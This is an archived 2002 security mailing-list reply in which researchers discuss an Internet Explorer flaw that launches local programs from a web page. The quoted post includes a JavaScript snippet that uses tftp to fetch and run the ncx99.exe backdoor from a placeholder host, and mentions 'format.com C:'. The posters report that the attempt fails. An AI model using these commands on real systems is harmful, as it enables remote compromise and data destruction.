Vulnerability Development mailing list archives

Re: Rather large MSIE-hole

From: "Eric V Brown" <Eric.V.Brown () aexp com>
Date: Thu, 14 Mar 2002 10:56:30 -0700


Could you not create a batch file that housed the commands you wanted to run
(with args) and just run the batch file?
I apologise if someone has already addressed this.

-Eric




From: Slow2Show <sl2sho () yahoo com> on 03/14/2002 09:30 AM

To:   vuln-dev () securityfocus com
cc:
Subject:  Re: Rather large MSIE-hole



In-Reply-To: <20020313125115.A14918 () castleblack darkflame net>

I havent tried, since i don't run MS, how about ?
var programName=new Array(
'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET

ncx99.exe',

'c:/winnt/system32/ncx99.exe');


I tried you idea nocon...it seems that the codebase
will not let you pass any parameters...
so 'C:/WINDOWS/system32/calc.exe' will work
but 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET
ncx99.exe' will not because of the parameters

I've researched getting this to work by using  unicode
chars to see if there was something that you could
put in to bypass this...but alas it wont work?note that
spaces are allowed in the directory path, but not after
the program name.

so this would work:
'C:/Program Files/intern~1/IEXPLORER.exe'

but these wont:
'C:/Program Files/intern~1/IEXPLORER.exe -k'
'C:/WINDOWS/system32/format.com C:'

//pseudo code...showing the concept of how I tried
every Unicode char
for(i=0;i<65535;i++)
     $= unicodeCharAt(i)
     'C:/Program Files/intern~/IEXPLORER.exe$-k'

The only possible attack vector I can see from this is
if you had prior knowledge to the path of a program
on a system that you wanted to execute. This is
slightly dangerous if you are running as admin
because the telnet server could be started by
launching
%SYSTEMROOT%\system32\tlntsess.exe
But you would still need a valid user/pass to gain
access.(and you should be slapped if you are web
browsing as admin)

I'm glad this hole turned out to be relatively benign...
this would have turned into a really dangerous hole
and not just an annoying one if parameters could be
passed.

But don't forget that script kiddies could "boot" you
by executing logoff.exe/tsshutdn.exe/tsdiscon.exe/

if anybody else finds a way of getting the parameters
to work....please post to the list.

lata,

-Slow2Show-
University of Florida

p.s. see ya @ SANS2002...party Florida style!!

Current thread:

FW: [Re: Rather large MSIE-hole] another variant, (continued)
- FW: [Re: Rather large MSIE-hole] another variant NoCoNFLiC (Mar 15)
  - Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this) David Barnett (Mar 16)
- Re: Rather large MSIE-hole foo BAR (Mar 12)
- RE: Rather large MSIE-hole Jim Harrison (SPG) (Mar 13)
  - Re: Rather large MSIE-hole Raul Dias (Mar 13)
- RE: Rather large MSIE-hole Maarten Oosterink (Mar 14)
  - Re: Rather large MSIE-hole Syzop (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
  - RE: Rather large MSIE-hole Ryan Sweat (Mar 14)
    - Re: Rather large MSIE-hole Keegan (Mar 14)
- Re: Rather large MSIE-hole Eric V Brown (Mar 14)
- RE: Rather large MSIE-hole Wall, Kevin (Mar 14)
- Re: Rather large MSIE-hole Paul D. Campbell (Mar 14)
  - Re: Rather large MSIE-hole KF (Mar 14)
    - Re: Rather large MSIE-hole jon schatz (Mar 14)
    - RE: Rather large MSIE-hole Chad Thunberg (Mar 15)
    - Re: Rather large MSIE-hole Joerg Over (Mar 15)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- RE: Rather large MSIE-hole John Swensson (Mar 14)
  - Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)

(Thread continues...)